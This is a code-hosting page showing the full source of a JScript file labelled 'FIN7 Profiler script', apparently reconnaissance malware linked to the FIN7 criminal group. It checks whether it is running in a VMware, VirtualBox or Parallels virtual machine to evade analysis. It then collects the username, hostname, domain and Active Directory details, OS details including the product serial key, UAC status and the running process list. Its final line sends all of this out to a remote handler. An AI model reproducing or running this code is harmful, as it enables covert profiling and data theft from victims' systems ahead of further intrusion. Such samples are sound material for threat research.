Permalink
Jun 6, 2019
Newer
100644
124 lines (123 sloc)
4.92 KB
1
// FIN7 Profiler script
2
/*
3
is_vm
4
get_active_directory_information
5
get_env_var
6
get_system_information
7
logging:
8
'adinformation***'
9
'part_of_domain***yes'
10
'os_*'
11
'dm_*'
12
'uac_level*'
13
'process_list***'
14
'is_vm***'
15
send_data ('request', 'action=add_info&info=' + components)
16
*/
17
18
function is_vm () {
19
var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');
20
var biosItems = new Enumerator(biosRequest);
21
for (; !biosItems.atEnd(); biosItems.moveNext()) {
22
var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();
23
var serial_number = biosItems.item().SerialNumber.toLowerCase();
24
if(serial_number.indexOf('parallels') >= 0 || serial_number.indexOf('vmware') >= 0) {
25
return true;
26
}
27
if(bios_versoin.indexOf('vmware') >= 0 || bios_versoin.indexOf('virtualbox') >= 0) {
28
return true;
29
}
30
}
31
return false;
32
}
33
function get_active_directory_information () {
34
try {
35
var adobj = new ActiveXObject('ADSystemInfo');
36
return adobj.ComputerName;
37
}catch(e) {
38
return false;
39
}
40
}
41
function get_env_var (name) {
42
return shell.ExpandEnvironmentStrings(name);
43
}
44
function get_system_information () {
45
var result = [];
46
try{
47
result.push('username***' + get_env_var('%USERNAME%'));
48
result.push('hostname***' + get_env_var('%COMPUTERNAME%'));
49
var ad = get_active_directory_information();
50
if(ad) {
51
result.push('adinformation***' + ad);
52
}else{
53
result.push('adinformation***no_ad');
54
}
55
var csRequest = wmi.ExecQuery('Select * from Win32_ComputerSystem');
56
var csItems = new Enumerator(csRequest);
57
for (; !csItems.atEnd(); csItems.moveNext()) {
58
if(csItems.item().PartOfDomain) {
59
result.push('part_of_domain***yes');
60
}else {
61
result.push('part_of_domain***no');
62
}
63
result.push('pc_domain***' + csItems.item().Domain);
64
result.push('pc_dns_host_name***' + csItems.item().DNSHostName);
65
result.push('pc_model***' + csItems.item().Model);
66
}
67
}catch(e) {
68
result.push('error0***code_error');
69
}
70
try{
71
var osRequest = wmi.ExecQuery ('select * from win32_OperatingSystem');
72
var osItems = new Enumerator(osRequest);
73
for (; !osItems.atEnd(); osItems.moveNext()) {
74
result.push('os_name***' + osItems.item().Name);
75
result.push('os_build_number***' + osItems.item().BuildNumber);
76
result.push('os_version***' + osItems.item().Version);
77
result.push('os_sp***' + osItems.item().ServicePackMajorVersion);
78
result.push('os_memory***' + osItems.item().TotalVirtualMemorySize);
79
result.push('os_free_memory***' + osItems.item().FreePhysicalMemory);
80
result.push('os_registered_user***' + osItems.item().RegisteredUser);
81
result.push('os_registered_org***' + osItems.item().Organization);
82
result.push('os_registered_key***' + osItems.item().SerialNumber);
83
result.push('os_last_boot***' + osItems.item().LastBootUpTime);
84
result.push('os_install_date***' + osItems.item().InstallDate);
85
result.push('os_arch***' + osItems.item().OSArchitecture);
86
result.push('os_product_type***' + osItems.item().ProductType);
87
result.push('os_language_code***' + osItems.item().OSLanguage);
88
result.push('os_timezone***' + osItems.item().CurrentTimeZone);
89
result.push('os_number_of_users***' + osItems.item().NumberOfUsers);
90
}
91
var dmRequest = wmi.ExecQuery ('select * from Win32_DesktopMonitor');
92
var dmItems = new Enumerator(dmRequest);
93
for (; !dmItems.atEnd(); dmItems.moveNext()) {
94
result.push('dm_type***' + dmItems.item().MonitorType);
95
result.push('dm_screen_size***' + dmItems.item().ScreenWidth + 'x' + dmItems.item().ScreenHeight);
96
}
97
if(shell.RegRead('HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA') == 1) {
98
result.push('uac_level***yes');
99
}else{
100
result.push('uac_level***no');
101
}
102
}catch(e) {
103
result.push('error1***code_error');
104
}
105
try{
106
var pRequest = wmi.ExecQuery('select * from win32_process');
107
var pItems = new Enumerator(pRequest);
108
var process_array = [];
109
for (;!pItems.atEnd(); pItems.moveNext()) {
110
process_array.push(pItems.item().name + '!' + pItems.item().processid);
111
}
112
var process_string = process_array.join('@');
113
result.push('process_list***' + process_string);
114
if(is_vm ()) {
115
result.push('is_vm***Yes');
116
}else{
117
result.push('is_vm***No');
118
}
119
}catch(e) {
120
result.push('error2***code_error');
121
}
122
return result.join('^^');
123
}
124
send_data ('request', 'action=add_info&info=' + encodeURIComponent(get_system_information()), true);